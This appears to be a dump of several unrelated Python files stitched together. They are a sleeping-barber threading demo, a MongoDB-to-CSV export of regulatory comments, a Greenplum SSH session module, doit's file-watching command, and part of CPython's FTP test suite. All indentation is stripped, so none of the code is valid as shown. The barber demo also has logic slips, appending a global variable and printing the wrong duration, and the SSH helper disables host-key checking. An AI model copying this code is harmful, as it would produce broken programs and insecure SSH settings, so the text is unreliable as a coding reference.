test.start_rgb_sensor()
time.sleep(30)
test.stop() # notify to stop producing-consuming frames
producer_thread.join(timeout=60)
consumer_thread.join(timeout=60)
test.analysis()
rgb_sensor.stop()
rgb_sensor.close()
|
sleeping_barber.py
|
from threading import Thread, Lock, Event
import time, random
#
# ref: https://github.com/bragisig/python-sleeping-barber/blob/master/sleeping_barber.py
#
mutex = Lock()
#Interval in seconds
customerIntervalMin = 5
customerIntervalMax = 15
haircutDurationMin = 3
haircutDurationMax = 15
class BarberShop:
waitingCustomers = []
def __init__(self, barber, numberOfSeats):
self.barber = barber
self.numberOfSeats = numberOfSeats
print 'BarberShop initilized with {0} seats'.format(numberOfSeats)
print 'Customer min interval {0}'.format(customerIntervalMin)
print 'Customer max interval {0}'.format(customerIntervalMax)
print 'Haircut min duration {0}'.format(haircutDurationMin)
print 'Haircut max duration {0}'.format(customerIntervalMax)
print '---------------------------------------'
def openShop(self):
print 'Barber shop is opening'
workingThread = Thread(target = self.barberGoToWork)
workingThread.start()
def barberGoToWork(self):
while True:
mutex.acquire()
if len(self.waitingCustomers) > 0:
c = self.waitingCustomers[0]
del self.waitingCustomers[0]
mutex.release()
self.barber.cutHair(c)
else:
mutex.release()
print 'Aaah, all done, going to sleep'
barber.sleep()
print 'Barber woke up'
def enterBarberShop(self, customer):
mutex.acquire()
print '>> {0} entered the shop and is looking for a seat'.format(customer.name)
if len(self.waitingCustomers) == self.numberOfSeats:
print 'Waiting room is full, {0} is leaving.'.format(customer.name)
mutex.release()
else:
print '{0} sat down in the waiting room'.format(customer.name)
self.waitingCustomers.append(c)
mutex.release()
barber.wakeUp()
class Customer:
def __init__(self, name):
self.name = name
class Barber:
barberWorkingEvent = Event()
def sleep(self):
self.barberWorkingEvent.wait()
def wakeUp(self):
self.barberWorkingEvent.set()
def cutHair(self, customer):
#Set barber as busy
self.barberWorkingEvent.clear()
print '{0} is having a haircut'.format(customer.name)
randomHairCuttingTime = random.randrange(haircutDurationMin, haircutDurationMax+1)
time.sleep(randomHairCuttingTime)
print '{0} is done'.format(customer.name)
if __name__ == '__main__':
customers = []
customers.append(Customer('Bragi'))
customers.append(Customer('Auja'))
customers.append(Customer('Iris'))
customers.append(Customer('Axel'))
customers.append(Customer('Andrea'))
customers.append(Customer('Agnar'))
customers.append(Customer('Mamma'))
customers.append(Customer('Solla'))
customers.append(Customer('Olla'))
customers.append(Customer('Berglind'))
customers.append(Customer('Bergdis'))
customers.append(Customer('Margret'))
customers.append(Customer('Brynjar'))
customers.append(Customer('Siggi'))
customers.append(Customer('Tomas'))
customers.append(Customer('Kristrun'))
customers.append(Customer('Heidrun'))
barber = Barber()
barberShop = BarberShop(barber, numberOfSeats=3)
barberShop.openShop()
while len(customers) > 0:
c = customers.pop()
#New customer enters the barbershop
barberShop.enterBarberShop(c)
customerInterval = random.randrange(customerIntervalMin,customerIntervalMax+1)
time.sleep(customerInterval)
|
export.py
|
#!/usr/bin/env python
import sys
import os
import csv
import time
import multiprocessing
from Queue import Empty
from datetime import datetime
from collections import namedtuple
from pymongo import Connection
import StringIO
pid = os.getpid()
import_start = time.time()
print '[%s] Loading trie...' % pid
from oxtail.matching import match
print '[%s] Loaded trie in %s seconds.' % (pid, time.time() - import_start)
F = namedtuple('F', ['csv_column', 'transform'])
def deep_get(key, dict, default=None):
if '.' in key:
first, rest = key.split('.', 1)
return deep_get(rest, dict.get(first, {}), default)
else:
out = dict.get(key, default)
return out if out else default
def getter(key, default=''):
return lambda d: deep_get(key, d, default)
DOCS_QUERY = {'deleted': False}
DOCS_FIELDS = [
F('document_id', getter('document_id')),
F('docket_id', getter('docket_id')),
F('agency', getter('agency')),
F('date_posted', getter('details.receive_date', None)),
F('date_due', getter('details.comment_end_date', None)),
F('title', getter('title')),
F('type', getter('type')),
F('org_name', getter('details.organization')),
F('submitter_name', lambda d: ' '.join(filter(bool, [deep_get('details.first_name', d, None), deep_get('details.mid_initial', d, None), deep_get('details.last_name', d, None)]))),
F('on_type', getter('comment_on.type')),
F('on_id', getter('comment_on.id')),
F('on_title', getter('comment_on.title')),
]
def filter_for_postgres(v):
if v is None:
return '\N'
if isinstance(v, datetime):
return str(v)
return v.encode('utf8').replace("\.", ".")
def process_doc(doc, fields=DOCS_FIELDS):
# field extraction
output = {
'metadata': [filter_for_postgres(f.transform(doc)) for f in fields],
'matches': [],
'submitter_matches': []
}
# entity extraction
if 'views' in doc and doc['views']:
for view in doc['views']:
if 'extracted' in view and view['extracted'] == True:
for entity_id in match(view['text']).keys():
# hack to deal with documents whose scrapes failed but still got extracted
object_id = doc['object_id'] if 'object_id' in doc else view['file'].split('/')[-1].split('.')[0]
output['matches'].append([doc['document_id'], object_id, view['type'], 'view', entity_id])
if 'attachments' in doc and doc['attachments']:
for attachment in doc['attachments']:
if 'views' in attachment and attachment['views']:
for view in attachment['views']:
if 'extracted' in view and view['extracted'] == True:
for entity_id in match(view['text']).keys():
output['matches'].append([doc['document_id'], attachment['object_id'], view['type'], 'attachment', entity_id])
# submitter matches
for entity_id in match('\n'.join([output['metadata'][7], output['metadata'][8]])).keys():
output['submitter_matches'].append([doc['document_id'], entity_id])
return output
# single-core version
def dump_cursor(c, fields, filename):
metadata_writer = csv.writer(open(sys.argv[3] + '_meta.csv', 'w'))
metadata_writer.writerow([f.csv_column for f in fields])
match_writer = csv.writer(open(sys.argv[3] + '_text_matches.csv', 'w'))
match_writer.writerow(['document_id', 'object_id', 'file_type', 'view_type', 'entity_id'])
submitter_writer = csv.writer(open(sys.argv[3] + '_submitter_matches.csv', 'w'))
submitter_writer.writerow(['document_id', 'entity_id'])
for doc in c:
doc_data = process_doc(doc)
metadata_writer.writerow(doc_data['metadata'])
match_writer.writerows(doc_data['matches'])
submitter_writer.writerows(doc_data['submitter_matches'])
# multi-core version and helpers
def write_worker(done_queue, filename, fields=DOCS_FIELDS):
print '[%s] Writer started.' % os.getpid()
metadata_writer = csv.writer(open(sys.argv[3] + '_meta.csv', 'w'))
metadata_writer.writerow([f.csv_column for f in fields])
match_writer = csv.writer(open(sys.argv[3] + '_text_matches.csv', 'w'))
match_writer.writerow(['document_id', 'object_id', 'file_type', 'view_type', 'entity_id'])
submitter_writer = csv.writer(open(sys.argv[3] + '_submitter_matches.csv', 'w'))
submitter_writer.writerow(['document_id', 'entity_id'])
while True:
try:
doc_data = done_queue.get(timeout=20)
except Empty:
print '[%s] CSV writes complete.' % os.getpid()
return
metadata_writer.writerow(doc_data['metadata'])
match_writer.writerows(doc_data['matches'])
submitter_writer.writerows(doc_data['submitter_matches'])
done_queue.task_done()
def process_worker(todo_queue, done_queue):
print '[%s] Worker started.' % os.getpid()
while True:
try:
doc = todo_queue.get(timeout=20)
except Empty:
print '[%s] Processing complete.' % os.getpid()
return
doc_data = process_doc(doc)
done_queue.put(doc_data)
todo_queue.task_done()
def dump_cursor_multi(c, fields, filename, num_workers):
todo_queue = multiprocessing.JoinableQueue(num_workers * 3)
done_queue = multiprocessing.JoinableQueue(num_workers * 3)
for i in range(num_workers):
proc = multiprocessing.Process(target=process_worker, args=(todo_queue, done_queue))
proc.start()
proc = multiprocessing.Process(target=write_worker, args=(done_queue, filename))
proc.start()
for doc in c:
todo_queue.put(doc)
todo_queue.join()
done_queue.join()
if __name__ == '__main__':
# set up options
from optparse import OptionParser
parser = OptionParser(usage="usage: %prog [options] host dbname file_prefix")
parser.add_option("-l", "--limit", dest="limit", action="store", type="int", default=None, help="Limit number of records for testing.")
parser.add_option("-m", "--multi", dest="multi", action="store", type="int", default=None, help="Set number of worker processes. Single-process model used if not specified.")
(options, args) = parser.parse_args()
# fetch options, args
host = args[0]
dbname = args[1]
prefix = args[2]
# do request and analysis
if options.limit:
cursor = Connection(host=host)[dbname].docs.find(DOCS_QUERY, limit=options.limit)
else:
cursor = Connection(host=host)[dbname].docs.find(DOCS_QUERY)
run_start = time.time()
print '[%s] Starting analysis...' % pid
if options.multi:
dump_cursor_multi(cursor, DOCS_FIELDS, prefix, options.multi)
else:
dump_cursor(cursor, DOCS_FIELDS, prefix)
print '[%s] Completed analysis in %s seconds.' % (pid, time.time() - run_start)
|
ssh_utils.py
|
#!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2008. All Rights Reserved.
#
# This file contains ssh Session class and support functions/classes.
import sys
import os
import cmd
import threading
from gppylib.commands.base import WorkerPool, REMOTE, ExecutionError
from gppylib.commands.unix import Hostname, Echo
sys.path.append(sys.path[0] + '/lib')
import pxssh
import pexpect
import socket
class HostNameError(Exception):
def __init__(self, msg, lineno = 0):
if lineno: self.msg = ('%s at line %d' % (msg, lineno))
else: self.msg = msg
def __str__(self):
return self.msg
class SSHError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
# Utility Functions
def ssh_prefix(host):
ssh = 'ssh -o "BatchMode yes" -o "StrictHostKeyChecking no" ' + host
return ssh
def get_hosts(hostsfile):
hostlist = HostList()
hostlist.parseFile(hostsfile)
return hostlist.get()
class HostList():
def __init__(self):
self.list = []
def get(self):
return self.list
def add(self, host, lineno=0):
'''Add a host to the hostlist.'''
# we don't allow the user@ syntax here
if host.find('@') >= 0:
raise HostNameError(host, lineno)
# MPP-13617 - check for ipv6
if host.find(':') >= 0:
try:
socket.inet_pton(socket.AF_INET6, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
# MPP-13617 - check for ipv4
if host.find('.') >= 0:
octs = host.split('.')
if len(octs) == 4 and False not in [o.isdigit() for o in octs]:
try:
socket.inet_pton(socket.AF_INET, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
self.list.append(host)
return self.list
def parseFile(self, path):
'''Add lines in a file to the hostlist.'''
with open(path) as fp:
for i, line in enumerate(fp):
line = line.strip()
if not line or line[0] == '#':
continue
self.add(line, i+1)
return self.list
def checkSSH(self):
'''Check that ssh to hostlist is okay.'''
pool = WorkerPool()
for h in self.list:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
raise SSHError("Unable to ssh to '%s'" % cmd.remoteHost)
return True
def filterMultiHomedHosts(self):
'''For multiple host that is of the same node, keep only one in the hostlist.'''
unique = {}
pool = WorkerPool()
for h in self.list:
cmd = Hostname('hostname', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for finished_cmd in pool.getCompletedItems():
hostname = finished_cmd.get_hostname()
if (not hostname):
unique[finished_cmd.remoteHost] = finished_cmd.remoteHost
elif not unique.get(hostname):
unique[hostname] = finished_cmd.remoteHost
elif hostname == finished_cmd.remoteHost:
unique[hostname] = finished_cmd.remoteHost
self.list = unique.values()
return self.list
# Session is a command session, derived from a base class cmd.Cmd
class Session(cmd.Cmd):
'''Implements a list of open ssh sessions ready to execute commands'''
verbose=False
hostList=[]
userName=None
echoCommand=False
class SessionError(StandardError): pass
class SessionCmdExit(StandardError): pass
def __init__(self, hostList=None, userName=None):
cmd.Cmd.__init__(self)
self.pxssh = []
self.prompt = '=> '
self.peerStringFormatRaw = None
if hostList:
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName
def peerStringFormat(self):
if self.peerStringFormatRaw: return self.peerStringFormatRaw
cnt = 0
for p in self.pxssh:
if cnt < len(p.x_peer): cnt = len(p.x_peer)
self.peerStringFormatRaw = "[%%%ds]" % cnt
return self.peerStringFormatRaw
def login(self, hostList=None, userName=None):
'''This is the normal entry point used to add host names to the object and log in to each of them'''
if self.verbose: print '\n[Reset ...]'
if not (self.hostList or hostList):
raise self.SessionError('No host list available to Login method')
if not (self.userName or userName):
raise self.SessionError('No user name available to Login method')
#Cleanup
self.clean()
if hostList: #We have a new hostlist to use, initialize it
self.hostList=[]
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName #We have a new userName to use
# MPP-6583. Save off term type and set to nothing before creating ssh process
origTERM = os.getenv('TERM', None)
os.putenv('TERM', '')
for host in hostList:
self.hostList.append(host)
p = pxssh.pxssh()
p.loginAsync(host, self.userName)
p.x_peer = host
p.x_pid = p.pid
self.pxssh.append(p)
# Restore terminal type
if origTERM:
os.putenv('TERM', origTERM)
some_errors = False
good_list = []
for p in self.pxssh:
success_login = False
if self.verbose: print '[INFO] login %s' % p.x_peer
try:
success_login = p.loginWait(set_term_dumb=True)
except Exception as e:
pass
if success_login:
good_list.append(p)
else:
some_errors = True
print '[ERROR] unable to login to %s' % p.x_peer
if some_errors:
print 'hint: use gpssh-exkeys to setup public-key authentication between hosts'
self.pxssh = good_list
def close(self):
return self.clean()
def reset(self):
'''reads from all the ssh connections to make sure we dont have any pending cruft'''
for s in self.pxssh:
s.readlines()
def clean(self):
net_return_code = self.closePxsshList(self.pxssh)
self.pxssh = []
return net_return_code
def emptyline(self):
pass
def escapeLine(self,line):
'''Escape occurrences of \ and $ as needed and package the line as an "eval" shell command'''
line = line.strip()
if line == 'EOF' or line == 'exit' or line == 'quit':
raise self.SessionCmdExit()
line = line.split('\\')
line = '\\\\'.join(line)
line = line.split('"')
line = '\\"'.join(line)
line = line.split('$')
line = '\\$'.join(line)
line = 'eval "' + line + '" < /dev/null'
return line
def executeCommand(self,command):
commandoutput=[]
if self.echoCommand:
escapedCommand = command.replace('"', '\\"')
command = 'echo "%s"; %s' % (escapedCommand, command)
#Execute the command in all of the ssh sessions
for s in self.pxssh:
s.sendline(command)
s.flush()
#Wait for each command and retrieve the output
for s in self.pxssh:
#Wait for each command to finish
#!! TODO verify that this is a tight wait loop and find another way to do this
while not s.prompt(120) and s.isalive() and not s.eof(): pass
for s in self.pxssh:
#Split the output into an array of lines so that we can add text to the beginning of
# each line
output = s.before.split('\n')
output = output[1:-1]
commandoutput.append(output)
return commandoutput.__iter__()
# Interactive command line handler
# Override of base class, handles commands that aren't recognized as part of a predefined set
# The "command" argument is a command line to be executed on all available command sessions
# The output of the command execution is printed to the standard output, prepended with
# the hostname of each machine from which the output came
def default(self, command):
line = self.escapeLine(command)
if self.verbose: print command
#Execute the command on our ssh sessions
commandoutput=self.executeCommand(command)
self.writeCommandOutput(commandoutput)
def writeCommandOutput(self,commandoutput):
'''Takes a list of output lists as an iterator and writes them to standard output,
formatted with the hostname from which each output array was obtained'''
for s in self.pxssh:
output = commandoutput.next()
#Write the output
if len(output) == 0:
print (self.peerStringFormat() % s.x_peer)
else:
for line in output:
print (self.peerStringFormat() % s.x_peer), line
def closePxsshList(self,list):
lock = threading.Lock()
return_codes = [0]
def closePxsshOne(p, return_codes):
p.logout()
p.close()
with lock:
return_codes.append(p.exitstatus)
th = []
for p in list:
t = threading.Thread(target=closePxsshOne, args=(p, return_codes))
t.start()
th.append(t)
for t in th:
t.join()
return max(return_codes)
|
cmd_auto.py
|
"""starts a long-running process that whatches the file system and
automatically execute tasks when file dependencies change"""
import os
import time
import sys
from multiprocessing import Process
from .exceptions import InvalidCommand
from .cmdparse import CmdParse
from .filewatch import FileModifyWatcher
from .cmd_base import tasks_and_deps_iter
from .cmd_base import DoitCmdBase
from .cmd_run import opt_verbosity, Run
opt_reporter = {
'name':'reporter',
'short': None,
'long': None,
'type':str,
'default': 'executed-only',
}
class Auto(DoitCmdBase):
"""the main process will never load tasks,
delegates execution to a forked process.
python caches imported modules,
but using different process we can have dependencies on python
modules making sure the newest module will be used.
"""
doc_purpose = "automatically execute tasks when a dependency changes"
doc_usage = "[TASK ...]"
doc_description = None
execute_tasks = True
cmd_options = (opt_verbosity, opt_reporter)
@staticmethod
def _find_file_deps(tasks, sel_tasks):
"""find all file deps
@param tasks (dict)
@param sel_tasks(list - str)
"""
deps = set()
for task in tasks_and_deps_iter(tasks, sel_tasks):
deps.update(task.file_dep)
deps.update(task.watch)
return deps
@staticmethod
def _dep_changed(watch_files, started, targets):
"""check if watched files was modified since execution started"""
for watched in watch_files:
# assume that changes to targets were done by doit itself
if watched in targets:
continue
if os.stat(watched).st_mtime > started:
return True
return False
def run_watch(self, params, args):
"""Run tasks and wait for file system event
This method is executed in a forked process.
The process is terminated after a single event.
"""
started = time.time()
# execute tasks using Run Command
arun = Run(task_loader=self._loader)
params.add_defaults(CmdParse(arun.options).parse([])[0])
try:
result = arun.execute(params, args)
# ??? actually tested but coverage doesnt get it...
except InvalidCommand as err: # pragma: no cover
sys.stderr.write("ERROR: %s\n" % str(err))
sys.exit(3)
# get list of files to watch on file system
watch_files = self._find_file_deps(arun.control.tasks,
arun.control.selected_tasks)
# Check for timestamp changes since run started,
# if change, restart straight away
if not self._dep_changed(watch_files, started, arun.control.targets):
# set event handler. just terminate process.
class DoitAutoRun(FileModifyWatcher):
def handle_event(self, event):
# print("FS EVENT -> {}".format(event))
sys.exit(result)
file_watcher = DoitAutoRun(watch_files)
# kick start watching process
file_watcher.loop()
def execute(self, params, args):
"""loop executing tasks until process is interrupted"""
while True:
try:
proc = Process(target=self.run_watch, args=(params, args))
proc.start()
proc.join()
# if error on given command line, terminate.
if proc.exitcode == 3:
return 3
except KeyboardInterrupt:
return 0
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
